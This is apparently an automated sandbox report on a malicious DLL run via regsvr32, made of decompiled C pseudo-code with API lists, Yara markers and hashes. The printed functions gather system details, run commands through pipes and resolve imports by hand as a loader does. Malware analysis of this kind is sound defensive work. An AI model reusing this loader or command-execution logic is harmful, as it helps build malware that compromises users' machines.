										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x2d90590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x2d907b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x2d90590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x2e0faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x2e0faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}































































                            0x10004a0b
                            0x10004a18
                            0x10004a23
                            0x10004a28
                            0x10004a2a
                            0x10004a2d
                            0x10004a32
                            0x10004a35
                            0x10004a3f
                            0x10004a41
                            0x10004a4e
                            0x10004a57
                            0x10004a57
                            0x10004a64
                            0x10004a7f
                            0x10004a86
                            0x10004a88
                            0x10004a8d
                            0x10004a92
                            0x10004a98
                            0x10004aa7
                            0x10004ac6
                            0x10004ac8
                            0x10004ace
                            0x10004ad4
                            0x10004ad9
                            0x10004add
                            0x10004ae0
                            0x10004aea
                            0x10004aec
                            0x10004aed
                            0x10004af8
                            0x10004afa
                            0x10004afd
                            0x10004b02
                            0x10004b09
                            0x10004b5e
                            0x10004b5e
                            0x10004b63
                            0x10004bca
                            0x10004bcf
                            0x10004bd1
                            0x10004bdb
                            0x10004be0
                            0x10004be0
                            0x10004bfa
                            0x10004bfc
                            0x10004bff
                            0x10004c01
                            0x00000000
                            0x00000000
                            0x10004c07
                            0x10004c11
                            0x10004c1a
                            0x10004c1f
                            0x10004c22
                            0x10004c28
                            0x10004c2e
                            0x10004c36
                            0x10004c38
                            0x10004c3b
                            0x10004c3c
                            0x10004c41
                            0x10004c44
                            0x10004c47
                            0x10004c49
                            0x10004c4d
                            0x10004c4d
                            0x10004c52
                            0x10004c55
                            0x10004c57
                            0x10004c5b
                            0x10004c5b
                            0x10004c62
                            0x10004c67
                            0x10004c69
                            0x10004c6d
                            0x10004c6f
                            0x10004c75
                            0x10004c79
                            0x10004c7c
                            0x10004c7d
                            0x10004c82
                            0x10004c85
                            0x10004c8a
                            0x10004cb2
                            0x10004cb8
                            0x10004cbf
                            0x10004cce
                            0x10004cd3
                            0x00000000
                            0x10004cd3
                            0x10004cc1
                            0x00000000
                            0x10004c8c
                            0x10004c8c
                            0x10004c91
                            0x10004c98
                            0x10004cdd
                            0x10004cdd
                            0x10004ce4
                            0x10004ce8
                            0x10004ce9
                            0x10004ce9
                            0x10004cf3
                            0x10004cf8
                            0x10004cfb
                            0x10004cfc
                            0x10004cfe
                            0x10004d00
                            0x10004d05
                            0x10004d0c
                            0x10004d4f
                            0x10004d0e
                            0x10004d13
                            0x10004d1b
                            0x10004d1f
                            0x10004d2a
                            0x10004d35
                            0x10004d3d
                            0x10004d41
                            0x10004d49
                            0x10004d49
                            0x10004d0c
                            0x10004d55
                            0x10004d58
                            0x10004d5a
                            0x10004d60
                            0x10004d60
                            0x10004d62
                            0x10004d62
                            0x00000000
                            0x10004d62
                            0x10004c9a
                            0x10004c9a
                            0x10004ca0
                            0x10004ca2
                            0x10004ca7
                            0x10004ca7
                            0x10004ca9
                            0x10004cd8
                            0x00000000
                            0x10004cd8
                            0x10004cab
                            0x10004ae4
                            0x10004ae4
                            0x00000000
                            0x10004ae4
                            0x10004c8a
                            0x10004b69
                            0x10004b77
                            0x10004b8a
                            0x10004b8f
                            0x10004b95
                            0x10004b97
                            0x10004baf
                            0x10004bb4
                            0x10004bbd
                            0x10004bc3
                            0x00000000
                            0x10004bc3
                            0x10004b9f
                            0x10004ba8
                            0x00000000
                            0x10004ba8
                            0x10004b0b
                            0x10004b11
                            0x10004b13
                            0x10004b51
                            0x10004b53
                            0x00000000
                            0x00000000
                            0x10004b55
                            0x10004b59
                            0x00000000
                            0x10004b59
                            0x10004b15
                            0x10004b1f
                            0x10004b2b
                            0x10004b36
                            0x10004b3d
                            0x10004b47
                            0x10004b4c
                            0x00000000
                            0x10004b4c
                            0x10004ae2
                            0x00000000
                            0x10004a66
                            0x10004a71
                            0x10004a77
                            0x10004a79
                            0x10004d64
                            0x10004d64
                            0x10004d66
                            0x10004d6c
                            0x10004d6c
                            0x00000000
                            0x10004a79

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset
                            • String ID:
                            • API String ID: 1985475764-0
                            • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                            • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                            • SysAllocString.OLEAUT32(?), ref: 1000D764
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                            • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                            • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                            • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                            0x100121ff
                            0x10012207
                            0x1001220c
                            0x1001220f
                            0x10012214
                            0x1001221a
                            0x10012223
                            0x10012227
                            0x10012227
                            0x10012223
                            0x10012229
                            0x1001222e
                            0x10012237
                            0x1001223c
                            0x1001223f
                            0x10012248
                            0x1001224a
                            0x10012251
                            0x10012262
                            0x10012262
                            0x10012264
                            0x1001226c
                            0x10012273
                            0x00000000
                            0x1001226e
                            0x10012272
                            0x10012272
                            0x10012253
                            0x10012253
                            0x10012259
                            0x1001225b
                            0x10012260
                            0x10012276
                            0x10012279
                            0x1001227e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10012260

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                            • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x2d90590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x2d91bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x2d907b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x2d907b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                            0x1000cf87
                            0x1000cf89
                            0x1000cf90
                            0x1000cf98
                            0x1000cfa2
                            0x1000cfa2
                            0x1000cfa8
                            0x1000cfb1
                            0x1000cfb7
                            0x1000cfb9
                            0x1000cfbd
                            0x1000cfbd
                            0x1000cfc2
                            0x1000cfc8
                            0x1000cfd8
                            0x1000cfe2
                            0x1000cfea
                            0x1000cfed
                            0x1000cff9
                            0x1000cfff
                            0x1000d004
                            0x1000d00a
                            0x1000d010
                            0x1000d016
                            0x1000d01e

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,02D90590,?,10003545), ref: 1000CF90
                            • GetModuleFileNameW.KERNEL32(00000000,02D91BD4,00000105,?,?,02D90590,?,10003545), ref: 1000CFB1
                            • memset.MSVCRT ref: 1000CFE2
                            • GetVersionExA.KERNEL32(02D90590,02D90590,?,10003545), ref: 1000CFED
                            • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            • String ID:
                            • API String ID: 3581039275-0
                            • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                            • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x2e0faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x2e0faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x2e0faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x2e0faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x2e0faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x2e0faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x2e0fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x2e0faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x2e0faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}




































                            0x1000a9c2
                            0x1000a9c4
                            0x1000a9d0
                            0x1000a9d5
                            0x1000a9d8
                            0x1000a9da
                            0x1000a9dd
                            0x1000a9e0
                            0x1000a9e7
                            0x1000a9ea
                            0x1000a9f1
                            0x1000a9f4
                            0x1000a9fe
                            0x1000a9ff
                            0x1000aa02
                            0x1000aa04
                            0x1000aa05
                            0x1000aa1c
                            0x1000ab9c
                            0x00000000
                            0x1000ab9c
                            0x1000aa33
                            0x1000ab68
                            0x1000ab6e
                            0x1000ab79
                            0x1000ab7b
                            0x1000ab83
                            0x1000ab83
                            0x1000ab8a
                            0x1000ab8c
                            0x1000ab95
                            0x1000ab95
                            0x00000000
                            0x1000ab98
                            0x1000aa39
                            0x1000aa3c
                            0x1000aa3f
                            0x1000aa45
                            0x1000aa4f
                            0x1000aa59
                            0x1000aa60
                            0x1000aa69
                            0x1000aa6b
                            0x1000aa71
                            0x00000000
                            0x00000000
                            0x1000aa7c
                            0x1000aa83
                            0x1000aa84
                            0x1000aa89
                            0x1000aa8a
                            0x1000aa8b
                            0x1000aa90
                            0x1000aa92
                            0x1000aa93
                            0x1000aa94
                            0x1000aa97
                            0x1000aa9d
                            0x00000000
                            0x00000000
                            0x1000aaa3
                            0x1000aaab
                            0x1000aaae
                            0x1000aab6
                            0x1000aab9
                            0x1000aabc
                            0x1000aac2
                            0x1000aad6
                            0x1000aadc
                            0x1000aae2
                            0x1000ab0b
                            0x1000aae4
                            0x1000aae4
                            0x1000aae6
                            0x1000aae8
                            0x1000aaf0
                            0x1000aaf8
                            0x1000aafd
                            0x1000aafd
                            0x1000ab11
                            0x1000ab13
                            0x1000ab13
                            0x1000ab1b
                            0x1000ab23
                            0x1000ab24
                            0x1000ab29
                            0x1000ab32
                            0x1000ab52
                            0x1000ab52
                            0x1000ab5a
                            0x1000ab5d
                            0x1000ab65
                            0x00000000
                            0x1000ab65
                            0x1000ab3b
                            0x1000ab3f
                            0x00000000
                            0x00000000
                            0x1000ab47
                            0x00000000

                            APIs
                            • memset.MSVCRT ref: 1000A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                            • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocFreememset
                            • String ID: D
                            • API String ID: 488076629-2746444292
                            • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                            • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}






















                            0x100124a1
                            0x100124a9
                            0x100124be
                            0x100124d0
                            0x100124dc
                            0x100124e2
                            0x100124e7
                            0x100124f3
                            0x1001265e
                            0x00000000
                            0x1001265e
                            0x100124f9
                            0x10012502
                            0x10012510
                            0x10012513
                            0x10012522
                            0x10012522
                            0x10012529
                            0x10012537
                            0x1001253a
                            0x10012557
                            0x1001255e
                            0x1001256e
                            0x10012586
                            0x10012570
                            0x10012578
                            0x10012578
                            0x10012589
                            0x1001258d
                            0x10012599
                            0x1001259d
                            0x100125a1
                            0x100125a5
                            0x100125b1
                            0x100125dc
                            0x100125e4
                            0x100125f6
                            0x10012602
                            0x100125b3
                            0x100125b8
                            0x100125c3
                            0x100125cf
                            0x100125cf
                            0x1001260b
                            0x10012611
                            0x1001261b
                            0x10012637
                            0x1001261d
                            0x1001262c
                            0x1001262c
                            0x1001261b
                            0x1001263f
                            0x10012648
                            0x10012648
                            0x10012656
                            0x00000000
                            0x10012656
                            0x10012562
                            0x00000000
                            0x10012562
                            0x00000000
                            0x1001253a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                            • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                            • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                            • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x2d90590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x2d90590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x2d90590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x2d90590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x2d90590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x2e0faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
